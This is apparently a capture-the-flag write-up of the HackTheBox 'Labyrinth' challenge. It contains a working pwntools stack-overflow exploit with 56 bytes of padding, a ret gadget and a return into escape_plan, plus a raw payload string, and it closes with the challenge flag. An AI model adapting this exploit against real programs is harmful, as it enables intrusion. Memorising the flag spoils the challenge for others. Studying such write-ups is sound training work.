
HtB - CA2023 - Labyrinth

Banner: HackTheBox Cyber Apocalypse 2023

You find yourself trapped in a mysterious labyrinth, with only one chance to escape. Choose the correct door wisely, for the wrong choice could have deadly consequences.


Analysis

Running the program as-is doesn't reveal much about what's going on, so we'll open it in Ghidra right off the bat;
Ghidra - main function

Here we can see that the first input is compared against ‘69’ or ‘069’. The second input is then read with fgets using a size of 0x44 (a potential buffer overflow, if the destination buffer is smaller than that), immediately followed by a “you failed” message.
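As an added illustration (not code from the challenge binary or this writeup), here is the bug shape the decompilation shows beside a hardened reader. Only the 0x44 length comes from the page; the 0x30 buffer size and the function names are assumptions for the demo.

```c
#include <stdio.h>
#include <string.h>

/* Illustration of the bug class described above: the length passed to
 * fgets (0x44 on the page) exceeds the buffer it writes into. The buffer
 * size is an assumption for this demo, not the binary's real frame layout. */
#define DOOR_BUF 0x30   /* assumed size of the local buffer */
#define READ_LEN 0x44   /* the length the writeup reports fgets being given */

/* The check a reviewer applies to the decompiled call: fgets(dst, n, in)
 * is only safe when n does not exceed the size of dst. Returns 1 if safe. */
int fgets_len_fits(size_t dst_size, size_t n) {
    return n <= dst_size;
}

/* Vulnerable shape (never called here): the constant READ_LEN is larger than
 * the buffer, so a long line overruns the stack frame. */
void read_choice_vuln(char *dst, FILE *in) {
    fgets(dst, READ_LEN, in);          /* dst is only DOOR_BUF bytes */
}

/* Hardened reader: the length is derived from the buffer, the newline is
 * stripped, and an over-long line has its tail drained so leftover bytes
 * do not get consumed by the next prompt. Returns bytes stored, -1 on EOF. */
long read_choice(char *dst, size_t dst_size, FILE *in) {
    if (dst_size == 0 || fgets(dst, (int)dst_size, in) == NULL)
        return -1;
    size_t len = strlen(dst);
    if (len > 0 && dst[len - 1] == '\n') {
        dst[--len] = '\0';
    } else {
        int c;                         /* line was longer than the buffer */
        while ((c = fgetc(in)) != EOF && c != '\n')
            ;
    }
    return (long)len;
}

/* Feeds a constructed line through read_choice via a temporary file so the
 * behaviour can be checked without touching real stdin. */
long read_choice_from_string(const char *line, char *dst, size_t dst_size) {
    FILE *in = tmpfile();
    if (in == NULL) return -1;
    fputs(line, in);
    rewind(in);
    long n = read_choice(dst, dst_size, in);
    fclose(in);
    return n;
}
```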

Let’s run the program with that information and see what we get;
segmentation fault

It looks like we’re on the right track with a buffer overflow!

While we still have Ghidra open, let’s see what other information we can find, mainly a function we can redirect execution to with our overflow;
escape_plan function

This looks like the function we want to execute; now we just need its address;
escape_plan mem address

Now we can open the program in gdb-peda, find the offset to the saved return address, and begin constructing our payload for the buffer overflow;

Steps to build the payload;

  1. create a pattern to find the offset;
     offset step 1
  2. find the offset;
    • offset step 2
    • offset step 2
  3. construct our payload;
    • initial payload: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAU\x12@\x00\x00\x00\x00\x00
  4. testing;
    • initial payload test
     It looks like our program is still crashing at this point. After much trial and error we discovered that the stack needed to be realigned to 16 bytes again. We can do this by simply returning into a lone ret instruction (a ret gadget) before the address of escape_plan.

Solution

We’ll put this information into a Python script to avoid any issues with inputting binary data;

#!/usr/bin/env python3
from pwn import *

# io = remote('ip', 1337)  # placeholders: change to the challenge IP & port to run remotely
io = process('./labyrinth')

pntr_addr = 0x00401255  # escape_plan() address
ret_addr = 0x401602     # address of a lone 'ret' instruction, used to realign the stack to 16 bytes

# Craft the payload: padding up to the saved return address,
# then the ret gadget for alignment, then the address of escape_plan()
payload = b'A' * 56  # our buffer padding
payload += p64(ret_addr) + p64(pntr_addr)

# send payload: the door choice first, then the overflowing second input
io.sendline(b'069')
io.sendlineafter(b'>> ', payload)

io.interactive()


Uncomment the remote connection, comment out the local one, adjust the IP & port, and we get our flag!

Flag HTB{3sc4p3_fr0m_4b0v3}

This post is licensed under CC BY 4.0 by the author.
